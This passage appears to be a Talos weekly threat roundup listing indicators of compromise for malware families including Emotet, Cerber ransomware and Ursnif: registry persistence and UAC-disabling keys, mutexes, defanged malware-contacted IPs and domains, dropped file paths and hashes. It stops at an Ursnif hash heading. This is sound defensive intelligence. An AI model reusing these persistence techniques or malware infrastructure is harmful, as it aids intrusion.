Friday, October 9, 2020

Threat Roundup for October 2 to October 9


Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Oct. 2 and Oct. 9. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found here that includes the complete list of file hashes, as well as all other IOCs from this post. A visual depiction of the MITRE ATT&CK techniques associated with each threat is also shown. In these images, the brightness of the technique indicates how prevalent it is across all threat files where dynamic analysis was conducted. There are five distinct shades that are used, with the darkest indicating that no files exhibited technique behavior and the brightest indicating that technique behavior was observed from 75 percent or more of the files.

The most prevalent threats highlighted in this roundup are:

Threat Name Type Description
Win.Packed.Banload-9773267-1 Packed Banload is a banking trojan believed to be developed by Brazilian cybercriminals and is used primarily to infect machines in Latin America. One notable aspect of Banload is its use of custom kernel drivers to evade detection.
Doc.Malware.Emotet-9772039-0 Malware Emotet is one of the most widely distributed and active malware families today. It is a highly modular threat that can deliver a wide variety of payloads. Emotet is commonly delivered via Microsoft Office documents with macros, sent as attachments on malicious emails.
Win.Malware.Razy-9772501-0 Malware Razy is oftentimes a generic detection name for a Windows trojan. It collects sensitive information from the infected host and encrypts the data, and sends it to a command and control (C2) server. Information collected might include screenshots. The samples modify auto-execute functionality by setting and creating a value in the registry for persistence.
Win.Ransomware.Cerber-9774556-0 Ransomware Cerber is a ransomware family that encrypts documents, photos, databases and other important files. Historically, this malware would replace files with encrypted versions and add the file extension ".cerber," although in more recent campaigns, other file extensions are used.
Win.Malware.Ursnif-9770757-2 Malware Ursnif is used to steal sensitive information from an infected host and can also act as a malware downloader. It is commonly spread through malicious emails or exploit kits.
Win.Packed.Zbot-9773448-0 Packed Zbot, also known as Zeus, is a trojan that steals information, such as banking credentials, using methods like key-logging and form-grabbing.
Win.Trojan.DarkComet-9772960-1 Trojan DarkComet and related variants are a family of remote access trojans designed to provide an attacker with control over an infected system. Capabilities of this malware include the ability to download files from a user's machine, mechanisms for persistence and hiding, and the ability to send back usernames and passwords from the infected system.
Win.Packed.Kovter-9770937-1 Packed Kovter is known for its fileless persistence mechanism. This family of malware creates several malicious registry entries which store its malicious code. Kovter is capable of reinfecting a system, even if the file system has been cleaned of the infection. Kovter has been used in the past to spread ransomware and click-fraud malware.

Threat Breakdown

Win.Packed.Banload-9773267-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 23 samples
Registry Keys Occurrences
<HKCU>\ENABLELUA 17
<HKCU>\ENABLELUA
Value Name: SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
17
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\PELODLO 13
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\PELODLO
Value Name: Type
13
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\PELODLO
Value Name: Start
13
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\PELODLO
Value Name: ErrorControl
13
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\PELODLO
Value Name: DisplayName
13
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\PELODLO
Value Name: WOW64
13
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\PELODLO
Value Name: ImagePath
13
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: Cleanup
11
<HKCU>\WAP 10
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
Value Name: EnableLUA
9
<HKCU>\CTFMONN 6
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: bbd53e391fcfb15ade714900bc64fe0a5f97a2b2e1d53229bfa181e9c8af4cad.exe
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\RCADSPK
Value Name: ImagePath
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\RCADSPK
Value Name: Start
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\RCADSPK
Value Name: Type
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\RCADSPK
Value Name: ErrorControl
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\RCADSPK
Value Name: mozmziz
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: c75d65fa755a87cf2b2fb5d74e1a7a09f2a22108eac3a4b22e09532b797b3a85.exe
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\RCADSPK
Value Name: iypxo
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\RCADSPK
Value Name: vyfuwkn
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\RCADSPK
Value Name: Group
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\OEOMKG 1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\OEOMKG
Value Name: ImagePath
1
Mutexes Occurrences
Global\<random guid> 19
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
162[.]125[.]8[.]15 2
64[.]136[.]20[.]39 2
186[.]202[.]95[.]69 1
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
srmvx[.]com[.]br 11
www[.]srmvx[.]com[.]br 6
dl[.]dropbox[.]com 2
geremias52[.]biz[.]ly 2
www[.]dropbox[.]com 1
cfl[.]dropboxstatic[.]com 1
www[.]arqueiroverde34[.]com[.]br 1
dropdr11[.]hospedagemdesites[.]ws 1
Files and or directories created Occurrences
%SystemRoot%\SysWOW64\drivers\trs.sys 13
\cleanup.bat 11
\cleanup.exe 11
\zip.exe 11
\TITI.EXE 11
\kill.txt 11
%LOCALAPPDATA%\wap.exe 10
%LOCALAPPDATA%\ctfmonn.exe 6
%APPDATA%\config.txt 2
%SystemRoot%\SysWOW64\drivers\peur.sys 1
\ulbcsnjr.txt 1
%SystemRoot%\SysWOW64\drivers\ammxllcr.sys 1
\wdjard.txt 1
%SystemRoot%\SysWOW64\drivers\luhfocak.sys 1
\kqtq.txt 1
%SystemRoot%\SysWOW64\drivers\bjauj.sys 1
\stkcket.txt 1
%ProgramFiles(x86)%\kvxjmh.txt 1
%SystemRoot%\SysWOW64\drivers\bzfcqa.sys 1
%LOCALAPPDATA%\ctmon.exe 1
%SystemRoot%\SysWOW64\drivers\khgvf.sys 1
%SystemRoot%\nney.txt 1
%SystemRoot%\SysWOW64\drivers\jtdlfdgf.sys 1
\rybnwhak.txt 1
%SystemRoot%\SysWOW64\drivers\njwyrd.sys 1
*See JSON for more IOCs

File Hashes

016e2c164894ee27212080aea92541219fe60d39cf5dfe2b221d3823c35d4c47 05518ab2523991a133ff3e98fa6c070a5131debac3acd78b4f0f99881bf68753 084066c4414c8d3dca285dad038c8b59f15dcd4c9fef396ed82d8696b006a66b 09997d67c3eb58e58b2a1d509da7e3cfeb24773a49884397c88f3775497f40f5 198e4fc3f3f351618d28f34d346ba4984947371156c16bb16a778ed07bb5d193 3097fb5438618f6454ee7837b5dcbc8cad6558249fc697517ce1d1214bdfc36a 3bf5381fe72d52b8634c2588eb48b7952ba8ae30d34b4ed886d675eaf736e79e 50664191f7cf78fe91982d6a46ca335cd811a6f3a28e7f8c590f43d25702496e 5dbb562e194028be06f1babb86dc57f44e25d8cb367fed0682f865728e543e35 6003533df1322c433eeedd1797bf2eadb819496f8a7eb3fd462219c90496b800 664d66616ae849f99c997bfafd2a6f1691ab7a8efec5f4e8934b7ab97d62ffde 67bca4fee0fe2bc8c6e690d56115002a787ca652b6e7f5083b60afabe2550517 68394780ab2dd62ac2ba75f028f0a7f483e791b8645997a471e87df037e0ad1e 7043ae58cc86dc2bb0de76c6fa646bc03106a5b9f3db8c7d69171ffa70285dcf 77d12539c771bf7baf4916e76e6d138e45c11a2f6bd3c9cbd43b5062eb151cfc 7b1741f05850063ea6e54a221e192e1f49ecd3a7d7dac187c8c0520c49d77f69 9b8cb4efa2192bc4d7c00745dfad7f48fd6d07776e5954ba389d7964a926e250 b54f344eb796e9cbc096d060ca33a3d5d77d9f24413141d4bf10976f83f5c6b3 bbd53e391fcfb15ade714900bc64fe0a5f97a2b2e1d53229bfa181e9c8af4cad c75d65fa755a87cf2b2fb5d74e1a7a09f2a22108eac3a4b22e09532b797b3a85 e94486573e4c00962986d4612d053601cd3cd11227fdccf1bd9fb761d91fa8dc f1206470e71f2fcae068f227e4d8e808dd9dc3a831256e169d9dc55f6eee8c85 f77118a0a142ad0906d23274de9029b4bc221f0d62e10b6a37b18aef15d4b239

Coverage

Product Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP



ThreatGrid



MITRE ATT&CK





Doc.Malware.Emotet-9772039-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 25 samples
Registry Keys Occurrences
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> 6
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Type
6
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Start
6
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ErrorControl
6
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ImagePath
6
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: DisplayName
6
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: WOW64
6
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ObjectName
6
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\NLSLEXICONS004B
Value Name: Description
1
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
91[.]227[.]6[.]25 25
82[.]76[.]111[.]249 25
202[.]22[.]141[.]45 25
37[.]187[.]161[.]206 25
202[.]29[.]239[.]162 25
80[.]87[.]201[.]221 25
216[.]47[.]196[.]104 25
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
reklamdasiniz[.]com 25
e13678[.]dspb[.]akamaiedge[.]net 3
Files and or directories created Occurrences
%HOMEPATH%\Kvo990W 25
%HOMEPATH%\Kvo990W\yhW0S8e 25
%HOMEPATH%\Kvo990w\Yhw0s8e\N4kqup.exe 25
%SystemRoot%\SysWOW64\<random, matching '[a-z]{8}'> 7
%SystemRoot%\SysWOW64\kbd101 1
%SystemRoot%\SysWOW64\Syncreg 1
%SystemRoot%\SysWOW64\winsta 1
%SystemRoot%\SysWOW64\dot3api 1
%SystemRoot%\SysWOW64\dinput 1
%SystemRoot%\SysWOW64\fthsvc 1
%SystemRoot%\SysWOW64\dsquery 1
%SystemRoot%\SysWOW64\npdeployJava1 1
%SystemRoot%\SysWOW64\oleprn 1
%SystemRoot%\SysWOW64\vpnikeapi 1
%SystemRoot%\SysWOW64\dhcpcore6 1
%SystemRoot%\SysWOW64\d3d8thk 1
%SystemRoot%\SysWOW64\cmdl32 1
%System32%\APHostService\wevtfwd.exe (copy) 1
%SystemRoot%\SysWOW64\KBDLT 1
%System32%\els\WMSPDMOE.exe (copy) 1
%System32%\Fondue\WSClient.exe (copy) 1
%SystemRoot%\SysWOW64\fdProxy 1
%SystemRoot%\SysWOW64\unregmp2 1
%System32%\MsiCofire\taskkill.exe (copy) 1
%System32%\Cortana.Persona\PortableDeviceWiaCompat.exe (copy) 1

File Hashes

0ea01c57af4d22f1d642786b3fe78a388596d5767f68a9b07cf27e8fd918fe30 121ecb91f7826fd60085bb7714bfb8b5d105be4e4f668eec414de30e8cd270b4 17b17925c3ee084d7e9fb525174f5b7d47a13877beb572de1dcf120b402ce8a4 1c8aa4d000da009d0202d1bcc7f0599bfcca7851466553c73bc526d63ece26ce 206999d227e0e50f4801c8401f3628dc56c8753feb40133d17983f9b3cdcfc88 2933181c2f3b553d4293bed4db65fb3112542d4d0d84370d40402bb6f4153dc0 2e0e591fded3770dfe0bf1d5d3dbdb04c8e66abe5ded5254d8116c2a18d7cb49 2e8d279277d371edd72a5b60067aadd566b15fe259df41fbe7666ad9df4408bc 4eb9021327cc94b31d089a88e3ad1be433ede04628958d0218bdcce6298b18fd 5eece7ec830568a2194fbb5ebd83497febb679a42b9c38e7644649fff908baed 616f48f98250a6852000f85e5a053fc411470a3283bc35a09567c5458ed97f38 68b775c77b26ff2bef9e30623e76ec0cc3128213aae2edf12a4e74597b992f75 6a644949315e239f75d68341fcafa66bdba7d7d06c0caf8c9a52eae5a2e27072 758cc00409af95532b76772f6578dfbc57079b4f4cfe18db983748e2bc71adc1 762c95f652ae31bf2cf7677493c9d267621e38e4217964dceb302ec2865e9dc7 7e96d2ac54a4bcb0c8224ce5bb4949a1526c328162a88fb81ee85d50e6acffbe 7f0cdca3765f3e20084311c71fe17ccd5ff74934aa53172d044dbc53ffc56bf7 8db95976218242d3ab54392bd2e0df2a03ce965de61894e269d1d38676d51d10 9762822ff4733ca51e04390ce36dc0db739af7f2e18bb4d10cef0defdbe794e9 9c6d95ee221c9de144628adf12d3396dc2cdebdd067c4a687e1f6ea770df525d a3022d8bff7c8b26e0a2d78cbff43d0fb7d41f954a0700000328da5849a0c48e a4f35491c2bb0141e74d5b72d0fad24c4c0263661baebb28b8eb06d14183efa7 b0f9cbed98fe85679664b456ee034fd09af7c0652ea72eb28c1bc16d08923346 b3abd74453332076f342cdffcf6eebd44704f41ffbbccb741dd8a2b53a1dd126 dfee5a29ad34bfef0757f0fd0a68849a0d65fc1ce012fd1a0cdc0339015dfde2
*See JSON for more IOCs

Coverage

Product Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

AMP



ThreatGrid



Malware



MITRE ATT&CK





Win.Malware.Razy-9772501-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 25 samples
Registry Keys Occurrences
<HKCU>\SOFTWARE\MICROSOFT\MSFONTSX 25
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
Value Name: EnableLUA
24
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: UACDisableNotify
24
<HKLM>\SYSTEM\CONTROLSET001\ENUM\PCI\VEN_8086&DEV_100E&SUBSYS_11001AF4&REV_03\3&2411E6FE&2&10
Value Name: CustomPropertyHwIdKey
24
<HKLM>\SYSTEM\CONTROLSET001\ENUM\ACPI\PNP0A08\1
Value Name: CustomPropertyHwIdKey
24
<HKLM>\SYSTEM\CONTROLSET001\ENUM\ACPI_HAL\PNP0C08\0
Value Name: CustomPropertyHwIdKey
24
<HKLM>\SYSTEM\CONTROLSET001\ENUM\ROOT\ACPI_HAL\0000
Value Name: CustomPropertyHwIdKey
24
<HKLM>\SYSTEM\CONTROLSET001\ENUM\HTREE\ROOT\0
Value Name: CustomPropertyHwIdKey
24
<HKLM>\SYSTEM\CONTROLSET001\ENUM\ROOT\*ISATAP\0000
Value Name: CustomPropertyHwIdKey
24
<HKLM>\SYSTEM\CONTROLSET001\ENUM\ROOT\*TEREDO\0000
Value Name: CustomPropertyHwIdKey
24
<HKLM>\SYSTEM\CONTROLSET001\ENUM\ROOT\MS_AGILEVPNMINIPORT\0000
Value Name: CustomPropertyHwIdKey
24
<HKLM>\SYSTEM\CONTROLSET001\ENUM\ROOT\MS_L2TPMINIPORT\0000
Value Name: CustomPropertyHwIdKey
24
<HKLM>\SYSTEM\CONTROLSET001\ENUM\ROOT\MS_NDISWANBH\0000
Value Name: CustomPropertyHwIdKey
24
<HKLM>\SYSTEM\CONTROLSET001\ENUM\ROOT\MS_NDISWANIP\0000
Value Name: CustomPropertyHwIdKey
24
<HKLM>\SYSTEM\CONTROLSET001\ENUM\ROOT\MS_NDISWANIPV6\0000
Value Name: CustomPropertyHwIdKey
24
<HKLM>\SYSTEM\CONTROLSET001\ENUM\ROOT\MS_PPPOEMINIPORT\0000
Value Name: CustomPropertyHwIdKey
24
<HKLM>\SYSTEM\CONTROLSET001\ENUM\ROOT\MS_PPTPMINIPORT\0000
Value Name: CustomPropertyHwIdKey
24
<HKLM>\SYSTEM\CONTROLSET001\ENUM\ROOT\MS_SSTPMINIPORT\0000
Value Name: CustomPropertyHwIdKey
24
<HKLM>\SYSTEM\CONTROLSET001\ENUM\ROOT\SYSTEM\0000
Value Name: CustomPropertyHwIdKey
24
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\MEDIAPLAYER\SETUP
Value Name: Progress_MaxDialog
24
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\MEDIAPLAYER\SETUP
Value Name: Progress_CurrentInstall
24
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\MEDIAPLAYER\SETUP
Value Name: Progress_MaxInstall
24
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\MEDIAPLAYER\SETUP
Value Name: Progress_CurrentDialog
24
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\MEDIAPLAYER\SERVICES
Value Name: NoServices
24
<HKLM>\SOFTWARE\MICROSOFT\UPNP DEVICE HOST\HTTP SERVER\VROOTS\/UPNPHOST 24
Mutexes Occurrences
WMSetup10RTM-UI 24
sduj3g 24
Microsoft_WMP_70_CheckForOtherInstanceMutex 1
Global\85551e81-05f3-11eb-887e-00501e3ae7b6 1
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
239[.]255[.]255[.]250 24
85[.]13[.]133[.]99 24
134[.]102[.]40[.]177 24
103[.]9[.]171[.]241 21
72[.]22[.]185[.]206 13
72[.]22[.]185[.]198 11
204[.]79[.]197[.]200 1
23[.]219[.]88[.]98 1
85[.]13[.]134[.]194 1
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
faserinstitut[.]com 24
jheus[.]websites[.]xs4all[.]nl 24
schule[.]csz-server[.]de 24
nopest[.]com[.]au 21
www[.]litespeedtech[.]com 20
www[.]jerrysbigworld[.]com 9
a1670[.]g2[.]akamai[.]net 1
Files and or directories created Occurrences
%TEMP%\m.avi 25
%TEMP%\msnix32.exe 25
%TEMP%\wmsetup.log 24
%SystemRoot%\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\UPnP Device Host\upnphost\udhisapi.dll 24
%SystemRoot%\SERVIC~2\Local Settings\AppData\Local\Temp\MpCmdRun.log 23

File Hashes

03b660882f75d0504b55c91ebe9d83290418cbddf61c0ce251dbb443081cbce4 11fdec8a5e58816217d676a5d71b19fdf3644f82612a58cf895fe384ce29f897 133d0442f0bd29752738989fa0646b80cac655a9c157556a59475c4015789a2d 162584c1e00acfc33b1445bb67df51d8db8557742725eaa2507c65debe48ebdd 2502a658291b8903f8dab1f5e0f674f834777e54005127203b0c1744c810320a 2ef3de98ca0deeea109069ab951cc67ff15041b7643822a781ea7dc39652018b 3015d663ede4ee9286c0910b29fa2d4bb9c231860b802bd27a06b0db70815d32 4945a26a11d3fe9bd8db594f9f5800c0e4b2077939781a03ad4554fc29cc14e1 4eae82cb707cf4d0d22aadb4d31b93ee2a6170214e8294460da47ecfda35e448 5139b348a16e8d51e57a4776bb850bffd5d0107be2923a444fa3ed22c9082972 558a7c0327ae7a2d5923830ad30d3a2e47e0176e6e23862b6d5852e56faf1678 569dab99f8cf61c38b695f10e12c85c051867065ac645624bfaf09a26a534d65 594d67e75abca313197cafd1e98643945809078c7f4c933fb189a03f1bc71ef7 5faa0e4ef3e6fb4e583ae4948e6b81bd5532bf500e2b3a86edd9df5c7e74d019 75062294d9fbe06f10099f867ab4d1439e10dc54c678049f782b58755782f0f4 79fe814d6595fd4d900ff70a1dae8e191d6822d4bbcc619ab8a68111b719b643 8da3fc23fa6983212d1aa98e14dc5196169a398e8a2c5d9377431bf26ff8ac42 924af7e4910f74452e5166b89b3062f16fcce72eaeef9408b3a930c847100eb5 9974106900e2c53dbf813f5022139abe88ac57e01975939c59e7e1944bd14fd9 aa779e1137b1f3f0448dbd5eeec3f5222a9092eea76d68b85defe0e1af7de1ea b7940778f91fb70e394ef3251b95e817c456f10d6a9b0e463088b033fde21297 bf455b8e16515592dc6e019e87f1a2eda19fe46478acc871f44fed21d0762a21 c5ad1651834bbccf09f02805b8ab6587a7df3d1cd7845c4a0727d83ec2676643 c5d955ee80ae8ec678c0aced278d7a5279d4e3678d0ef04b84748d20d40519af e275499c7fe644b71847dcd1aa8d82915f2c2d764e56d54de80928e0dae8cead

Coverage

Product Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP



ThreatGrid



MITRE ATT&CK





Win.Ransomware.Cerber-9774556-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 51 samples
Registry Keys Occurrences
<HKLM>\SYSTEM\CONTROLSET001\CONTROL\SESSION MANAGER 51
<HKLM>\SYSTEM\CONTROLSET001\CONTROL\SESSION MANAGER
Value Name: PendingFileRenameOperations
51
Mutexes Occurrences
shell.{381828AA-8B28-3374-1B67-35680555C5EF} 51
\x6d74\x666f\x626e\x6962\x686d\x67\x6768\x6a71\x706c\x6e66\x6e6c\x706d\x6f62\x656c\x63\x7474\x7364\x636c\x706d\x6d71\x62 51
shell.{<random GUID>} 25
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
178[.]33[.]159[.]0/27 51
178[.]33[.]158[.]0/27 51
178[.]33[.]160[.]0/22 51
178[.]128[.]255[.]179 26
172[.]67[.]2[.]88 19
104[.]20[.]21[.]251 17
104[.]20[.]20[.]251 15
104[.]24[.]105[.]254 9
104[.]24[.]104[.]254 6
172[.]67[.]157[.]138 2
204[.]79[.]197[.]200 1
104[.]26[.]14[.]247 1
104[.]26[.]15[.]247 1
172[.]67[.]69[.]167 1
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
api[.]blockcypher[.]com 51
bitaps[.]com 26
chain[.]so 26
btc[.]blockr[.]io 26
hjhqmbxyinislkkt[.]1j9r76[.]top 25
hjhqmbxyinislkkt[.]1bxzyr[.]top 2
sochain[.]com 2
p27dokhpz2n7nvgr[.]1j9r76[.]top 1
Files and or directories created Occurrences
%TEMP%\d19ab989 51
%TEMP%\d19ab989\4710.tmp 51
%TEMP%\d19ab989\a35f.tmp 51
%TEMP%\tmp<random, matching [A-F0-9]{1,4}>.tmp 51
%TEMP%\tmp<random, matching [A-F0-9]{1,4}>.bmp 51
<dir>\_R_E_A_D___T_H_I_S___<random, matching '[A-F0-9]{4,8}'>_.txt 51
<dir>\_R_E_A_D___T_H_I_S___<random, matching '[A-F0-9]{4,8}'>_.hta 51
%TEMP%\24e2b309\1719.tmp 25
%TEMP%\24e2b309\4436.tmp 25
<dir>\<random, matching [A-Z0-9\-]{10}.[A-F0-9]{4}> (copy) 25

File Hashes

0135b84fca1a4d14abc635531bc63309ea8439294d7e0e0f2ae3eddd87c7ebc6 048be43f802127b08b250d125d1f9c57b1bdd081edd8619a8562ab7f7120833a 08d712ea317009d92007691fe06040f6e0cbbef628c1255524dc85eb949de016 099a237f43a93b2f0891f693484dd1e28e568a02ba75ff6a27acf649235d1f07 0cd5957d933c9c654759cecfb9b6868219b3020b290887b993c006f24b75119a 0e686ecb077ec1e60e3f1d92ddab2fc6554976ad377507178b80eca3c5d158f6 19fb88bee4ee9b388b777617ecf16797d271a47cead0b097c94192ca626b976f 1e9b524bb8151033d40edb940f8ac6f9e380de2345523d47f9087feaa4b038f1 2ea10f1381dec68edfd7d5c3c315fe0b166761f63a4f555e4b4710e026beb5be 2fc059e4e35082674b57f2cd8ecdc8f9ecf37c76cb665367c6357b17c321a84a 317a22232e759217381a98fd2127b216b9d806d36315df4aa794081fc334e3e3 32f02dd23c37d273724efe3944de1ba7427970b321878c82268b4272dc9f91a4 33c81079a0356fe96ba9fbeb7351fdb024564cacab60501618a3e282b54c50ff 33f4edf991981aa5a9336e9c0b4756197f88cddcda4ee5c885109532dbe53571 3be7e6ff52d1d0c3c820e1706a1bfae2f197a4a22d884678e00d072d4437c5a1 3f3f7ab6e06d3027226069aa2d3dab78aedc3597309e493010439e64b4a00f29 43098ad74d48b32479ff339bfc30e8ec54fd9ddc171b1147c1940e5f735c0d43 4943704a7c6185fa049b9f311414ef5ca30bc135c3b97c2502820a9a4f9f7add 4bcde915519a78d346ab973f2f4023891d303d6ab9c16a01182cc9b5a47ab2f7 4f81c067e505b3bb70ab0850649ada75f76dce32b43035c02b4688f9f8317c2a 54997ae882b4a1f7fabded5abef965870b6dbc087c9ad9c6c62e14149eea67dd 574bd68f728b68087076ddf1226df935432636a410fbe211d8d6d55a8fc51e80 61c830397fe79e5d3d71147586f9e83a7c616785dc4557b9d0d8ede7957bcbd0 7109d8d69805f69acd87b98404d2f6ec1e13f96d85357d46ccdb8abd886df6cf 870e3f05458b50578e114899ce702e51d4a26575b0e17bafc4a67cbf76b49e1c
*See JSON for more IOCs

Coverage

Product Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP



ThreatGrid



Malware



MITRE ATT&CK





Win.Malware.Ursnif-9770757-2

Indicators of Compromise

  • IOCs collected from dynamic analysis of 11 samples
Registry Keys Occurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: aclutxml
9
<HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT\02BAB7FD-7931-84AC-1356-BDF8F7EA41AC 9
<HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT\02BAB7FD-7931-84AC-1356-BDF8F7EA41AC
Value Name: {D7908994-4AF8-210B-0CFB-1EE5005F32E9}
6
<HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT\02BAB7FD-7931-84AC-1356-BDF8F7EA41AC
Value Name: Client
6
<HKCU>\SOFTWARE\MICROSOFT\IAM
Value Name: Server ID
4
<HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT\02BAB7FD-7931-84AC-1356-BDF8F7EA41AC
Value Name: {344BD002-037D-867E-2DA8-E71AB15C0BEE}
4
Mutexes Occurrences
Local\{31F7CC8D-DC06-8BF4-6EF5-D0EF82F90493} 6
Local\{73A713E4-3646-1D08-D857-CAA18C7B9E65} 6
Local\{C955B29C-9464-E306-E60D-08C77A91BCEB} 6
{3686B563-1D48-D82A-57CA-A18C7B9E6580} 6
{3273ED2E-E9B8-342D-0386-2DA8E71AB15C} 3
{722ADF9A-2987-7426-43C6-6DE8275AF19C} 2
setaajmytymsgnewe 1
{4E42D13C-5565-B0F6-4F62-59E4F3B69D58} 1
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
62[.]149[.]142[.]160 6
62[.]149[.]142[.]166 6
208[.]67[.]222[.]222 4
3[.]18[.]65[.]24 3
3[.]18[.]25[.]61 3
204[.]79[.]197[.]200 1
205[.]185[.]216[.]10 1
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
schema[.]org 6
api[.]w[.]org 6
gmpg[.]org 6
maxcdn[.]bootstrapcdn[.]com 6
ogp[.]me 6
themeisle[.]com 6
www[.]addthis[.]com 6
atomi[.]org 6
www[.]capoverso[.]info 6
capoverso[.]info 6
smashballoon[.]com 6
www[.]azzurrabiagi[.]com 6
cyberplay[.]at 5
resolver1[.]opendns[.]com 4
222[.]222[.]67[.]208[.]in-addr[.]arpa 4
myip[.]opendns[.]com 4
deepmoler[.]at 4
cds[.]d2s7q6s2[.]hwcdn[.]net 1
ctldl[.]windowsupdate[.]com 1
Files and or directories created Occurrences
%APPDATA%\Microsoft\Cicprov 9
%APPDATA%\Microsoft\Cicprov\api-draw.exe 9
%TEMP%\<random, matching [A-F0-9]{3,4}> 9
%TEMP%\<random, matching [A-F0-9]{3,4}\[A-F0-9]{2,4}>.bat 9
%APPDATA%\Mozilla\Firefox\Profiles\<profile ID>.default\prefs.js 6
\{5D9E0C27-180C-9720-0AE1-CCBBDEA5C01F} 4
%TEMP%\EFE8\F7F4.tmp 1
%TEMP%\2C5C\162E.tmp 1
%TEMP%\B897.bi1 1
%TEMP%\5EF0\2F78.tmp 1
%TEMP%\C515.bi1 1
%TEMP%\CAAC\6556.tmp 1
%TEMP%\E0A0.bi1 1
%TEMP%\D844\EC22.tmp 1
%TEMP%\F883.bi1 1
%TEMP%\9442\CA21.tmp 1

File Hashes

